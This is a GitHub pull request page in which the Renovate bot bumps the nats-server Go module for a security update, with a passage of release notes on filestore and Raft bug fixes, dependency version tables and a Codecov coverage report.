  • Race conditions and potential panics fixed in the handling of some JetStream API handlers (#​7380)
  • The filestore no longer loses tombstones when using secure erase (#​7384)
  • The filestore no longer loses the last sequence when recovering blocks containing only tombstones (#​7384)
  • The filestore now correctly cleans up empty blocks when selecting the next first block (#​7384)
  • The filestore now correctly obeys sync_always for writing TTL and scheduling state files (#​7385)
  • Fixed a data race on a wait group when mirroring streams (#​7395)
  • Skipped message sequences are now checked for ordering before apply, fixing a potential stream desync on catchups (#​7400)
  • Skipped message sequences now correctly detect gaps from erased message slots, fixing potential cache issues, slow reads and issues with catchups (#​7399, #​7401)
  • Raft groups now report peer activity more consistently, fixing some cases where asset info and monitoring endpoints may report misleading values after leader changes (#​7402)
  • Raft groups will no longer permit truncations from unexpected catchup entries if the catchup is completed (#​7424)
  • The filestore will now correctly release locks when erasing messages returns an error (#​7431)
  • Caches will now no longer expire unnecessarily when re-reading the same sequences multiple times in first-matching code paths (#​7435)
  • A couple of issues related to header handling have been fixed (#​7465)
  • No-wait requests now return a 400 No Messages response correctly if the stream is empty (#​7466)
  • Raft groups will now only report leadership status after a no-op entry on recovery (#​7460)
  • Fixed a race condition in the filestore that could happen between storing messages and shutting down (#​7496)
  • A panic that could occur when recovering streams in parallel has been fixed (#​7503)
  • An off-by-one when detecting holes at the end of a filestore block has been fixed (#​7508)
  • Writing skip message records in the filestore no longer releases and reacquires the lock unnecessarily (#​7508)
  • Fixed a bug on metalayer recovery where stream and consumer monitor goroutines for recreated assets would run with the wrong Raft group (#​7510)
  • Scaling up an asset from R1 now results in an installed snapshot, allowing

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate
Copy link
Contributor Author

renovate bot commented Apr 15, 2025

ℹ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

  • 10 additional dependencies were updated
  • The go directive was updated for compatibility reasons

Details:

Package Change
go 1.22 -> 1.23.0
github.com/nats-io/nats.go v1.36.0 -> v1.39.1
github.com/klauspost/compress v1.17.9 -> v1.18.0
github.com/minio/highwayhash v1.0.2 -> v1.0.3
github.com/nats-io/jwt/v2 v2.5.7 -> v2.7.3
github.com/nats-io/nkeys v0.4.7 -> v0.4.10
go.uber.org/automaxprocs v1.5.3 -> v1.6.0
golang.org/x/crypto v0.24.0 -> v0.34.0
golang.org/x/sys v0.21.0 -> v0.30.0
golang.org/x/text v0.16.0 -> v0.22.0
golang.org/x/time v0.5.0 -> v0.10.0

@codecov
Copy link

codecov bot commented Apr 15, 2025

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 54.81%. Comparing base (3cf2082) to head (a6bcd4a).

Additional details and impacted files
@@           Coverage Diff           @@
##             main      #76   +/-   ##
=======================================
  Coverage   54.81%   54.81%           
=======================================
  Files          25       25           
  Lines        1609     1609           
=======================================
  Hits          882      882           
  Misses        630      630           
  Partials       97       97           

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:
  • ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
  • 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

@renovate renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 3cb83fd to 1dd0113 Compare May 7, 2025 11:02
@renovate renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 1dd0113 to 35725fc Compare August 10, 2025 14:04
@renovate renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 35725fc to 69e2624 Compare October 9, 2025 09:53
@renovate
Copy link
Contributor Author

renovate bot commented Dec 15, 2025

ℹ️ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

  • 12 additional dependencies were updated
  • The go directive was updated for compatibility reasons

Details:

Package Change
go 1.22 -> 1.25.0
github.com/nats-io/nats.go v1.36.0 -> v1.49.0
github.com/klauspost/compress v1.17.9 -> v1.18.4
github.com/minio/highwayhash v1.0.2 -> v1.0.4-0.20251030100505-070ab1a87a76
github.com/nats-io/jwt/v2 v2.5.7 -> v2.8.1
github.com/nats-io/nkeys v0.4.7 -> v0.4.15
go.uber.org/automaxprocs v1.5.3 -> v1.6.0
golang.org/x/crypto v0.24.0 -> v0.49.0
golang.org/x/net v0.26.0 -> v0.51.0
golang.org/x/sys v0.21.0 -> v0.42.0
golang.org/x/text v0.16.0 -> v0.35.0
golang.org/x/time v0.5.0 -> v0.15.0
golang.org/x/tools v0.21.1-0.20240508182429-e35e4ccd0d2d -> v0.42.0

@renovate renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 69e2624 to 2765e0c Compare February 24, 2026 19:44
@renovate renovate bot changed the title test: update module github.com/nats-io/nats-server/v2 to v2.10.27 [security] test: update module github.com/nats-io/nats-server/v2 to v2.11.12 [security] Feb 24, 2026
@renovate renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 2765e0c to a6bcd4a Compare March 24, 2026 21:40
@renovate renovate bot changed the title test: update module github.com/nats-io/nats-server/v2 to v2.11.12 [security] test: update module github.com/nats-io/nats-server/v2 to v2.11.15 [security] Mar 24, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants